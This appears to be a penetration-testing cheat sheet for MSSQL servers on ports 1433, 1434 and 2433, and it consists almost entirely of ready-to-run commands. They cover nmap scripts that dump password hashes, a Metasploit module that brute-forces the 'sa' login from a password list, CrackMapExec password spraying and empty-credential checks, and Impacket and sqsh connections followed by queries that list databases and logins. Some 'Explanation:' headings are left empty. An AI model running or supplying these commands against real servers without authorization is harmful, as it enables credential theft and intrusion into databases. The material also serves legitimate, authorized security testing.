MSSQL 1433,1434,2433

MSSQL Enumeration and Scanning (Ports 1433, 1434, 2433)

Replace <target_ip> with the actual IP address of the target.

# Define the target IP
export TARGET_IP="192.168.1.100"

nmap -p 1433,1434,2433 -sV --script ms-sql* <target_ip>

Explanation:

nmap -p 1433,1434,2433 --script ms-sql-info,ms-sql-dump-hashes <target_ip>

Explanation:

ms-sql-info: Retrieves version and instance information.
ms-sql-dump-hashes: Attempts to dump password hashes if authentication succeeds.

Use the MSSQL auxiliary module:

use auxiliary/scanner/mssql/mssql_ping
set RHOSTS <target_ip>
run

Use the MSSQL login module:

use auxiliary/scanner/mssql/mssql_login
set RHOSTS <target_ip>
set USERNAME sa
set PASS_FILE /path/to/password-list.txt
run

Connect to the MSSQL server:

sqsh -S <target_ip> -U <username> -P <password>

Run queries to enumerate databases and users:

SELECT name FROM sys.databases;
SELECT * FROM sys.syslogins;

Clone the Impacket repository:

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket/examples

Run mssqlclient:

python3 mssqlclient.py <domain>/<username>:<password>@<target_ip>

Execute enumeration commands:

SELECT name FROM sys.databases;
SELECT name FROM sysobjects WHERE xtype = 'U';

cme mssql <target_ip> --port 1433,1434,2433

cme mssql <target_ip> -u '' -p ''

cme mssql <target_ip> -u sa -P /path/to/password-list.txt

Ensure tools like sqsh, Impacket, Nmap, and CrackMapExec are installed.
Enumerate for default credentials and weak passwords.
Leverage scripts for detailed enumeration and potential exploitation of misconfigurations.

Last updated 4 months ago